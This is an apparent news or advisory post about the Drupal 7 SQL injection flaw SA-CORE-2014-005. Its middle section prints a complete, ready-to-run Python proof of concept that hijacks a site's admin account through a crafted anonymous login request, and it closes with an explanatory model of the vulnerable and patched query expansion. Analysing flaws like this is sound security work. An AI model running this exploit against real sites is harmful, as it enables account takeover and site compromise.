A new SQL injection vulnerability in Drupal has been discovered and reported to the Drupal security team, who state that all versions of Drupal 7 prior to 7.32 are affected by a “Highly Critical” SQL injection bug (SA-CORE-2014-005). Version 7.32 is now available to address the bug, and the Drupal team strongly recommends that Drupal 7 administrators update their sites immediately. Drupal is a popular free and open-source content management system.
An attacker could exploit this vulnerability to achieve privilege escalation or to execute arbitrary PHP code; other, unspecified attacks are said to be possible. At the time the vulnerability was disclosed, no known exploits were in use. The attack can be launched by an anonymous user, so no authentication, social engineering or other preparatory work is necessary.
Robert Horton, European managing director of security consulting at NCC Group, said that the Drupal flaw is of particular concern because it’s “extremely trivial to exploit by low skilled attackers”. “We expect exploitation to be rapid and systemic with proof-of-concept exploits already available by individuals looking to either obtain sensitive data, or to inject malicious code into otherwise legitimate sites in order to attack users,” Horton warned.
Despite its severity, the Drupal bug was overlooked for months, Horton added. “The fact that this vulnerability was independently sitting in the public domain in Drupal’s public bug tracking database since November 2013 is interesting,” Horton said. “They appear to have overlooked the severity and it took an independent researcher to separately find it and bang the security drum in order for people to take notice.”
Here is a proof of concept (POC) for the vulnerability:
# Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
# Creditz to https://www.reddit.com/user/fyukyuk
# Python 2 script; needs drupalpass.py from the repository linked below on sys.path.
import urllib2, sys
from drupalpass import DrupalHash  # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py

if len(sys.argv) != 4:
    print "usage: %s host username password" % sys.argv[0]
    print "example: %s http://nope.io admin wowsecure" % sys.argv[0]
    sys.exit(1)

host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]

# Hash the chosen password with Drupal 7's scheme, borrowing the cost and salt
# from an existing hash string; Drupal 7 stores the first 55 characters.
new_hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()[:55]

# The user login block is reachable by anonymous users on the node listing.
target = '%s/?q=node&destination=node' % host

# The injection rides in the array *key* of the name[] field: Drupal 7 before
# 7.32 used that key verbatim when expanding the :name placeholder, so the
# UPDATE runs as a second statement and rewrites uid 1's name and password hash.
post_data = ("name[0%20;update+users+set+name%3d'" + user
             + "'+,+pass+%3d+'" + new_hash
             + "'+where+uid+%3d+'1';;#%20%20]=bob"
             + "&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in")

content = urllib2.urlopen(url=target, data=post_data).read()

# A PHP warning about the array-valued name field is the indicator that the
# request went through the vulnerable code path.
if "mb_strlen() expects parameter 1" in content:
    print "Success!\nLogin now with user:%s and pass:%s" % (user, password)
else:
    print "No success indicator in the response."
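To show why the array key in the POST body above turns into SQL, here is an added example (not code from the original post or from the Drupal project) that models in Python the placeholder expansion Drupal 7's database layer performed for array-valued query arguments before 7.32, next to the corrected behaviour. The login query string, the form-parsing helper and the two expansion variants are simplified models written for this illustration; the sample body is a constructed copy of the POC's payload with placeholder credentials. The one fact it rests on is that 7.32 re-indexes the array (array_values()) before naming placeholders, so positional indices rather than client-supplied keys reach the query text.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample: the body the POC above sends, with placeholder values
# where the real script puts the chosen username and the 55-char hash.
POC_BODY = ("name[0%20;update+users+set+name%3d'admin'+,+pass+%3d+'$S$HASH'"
            "+where+uid+%3d+'1';;#%20%20]=bob&name[0]=larry&pass=lol"
            "&form_build_id=&form_id=user_login_block&op=Log+in")

# Simplified model of the query the login validation runs for the submitted
# name (the real query uses Drupal's {users} table-prefix syntax).
LOGIN_QUERY = "SELECT * FROM users WHERE name = :name AND status = 1"


def php_style_form(body):
    """Decode a form body the way PHP populates $_POST: a field written as
    field[key]=value becomes a nested array keyed by the literal bracket text.
    Splits on '&' only, because ';' appears inside the injected key."""
    form = {}
    for pair in body.split('&'):
        raw_key, _, raw_value = pair.partition('=')
        key, value = unquote_plus(raw_key), unquote_plus(raw_value)
        m = re.fullmatch(r'([^\[]+)\[(.*)\]', key)
        if m:
            form.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            form[key] = value
    return form


def expand_arguments(query, args, hardened):
    """Model of expanding a placeholder bound to an array into one placeholder
    per element. Vulnerable (pre-7.32): new placeholder names are built from
    the array's *keys*, which the client controls. Hardened (7.32): the array
    is re-indexed first, so only 0, 1, 2, ... ever reach the SQL text."""
    args = dict(args)
    for key, data in list(args.items()):
        if not isinstance(data, dict):
            continue
        items = enumerate(data.values()) if hardened else data.items()
        new_keys = {'%s_%s' % (key, i): value for i, value in items}
        # The placeholder list is spliced straight into the SQL string.
        query = re.sub(re.escape(key) + r'\b',
                       lambda _m: ', '.join(new_keys), query)
        del args[key]
        args.update(new_keys)
    return query, args


def login_query_for(body, hardened):
    """Return (sql, bound_args) the modelled login step would execute."""
    form = php_style_form(body)
    return expand_arguments(LOGIN_QUERY, {':name': form['name']}, hardened)


if __name__ == '__main__':
    for hardened in (False, True):
        sql, bound = login_query_for(POC_BODY, hardened)
        print('hardened' if hardened else 'vulnerable', '->', sql)
        print('   bound:', bound)
```

Running it prints both expansions: the vulnerable one has the UPDATE spliced between the SELECT and the `#` comment, which is the second statement the POC relies on, while the hardened one yields only `:name_0, :name_1` with the attacker's key text confined to the bound values. The mb_strlen() warning the POC checks for is a side effect of the array-valued name field reaching string handling later in the login path, not of the UPDATE itself.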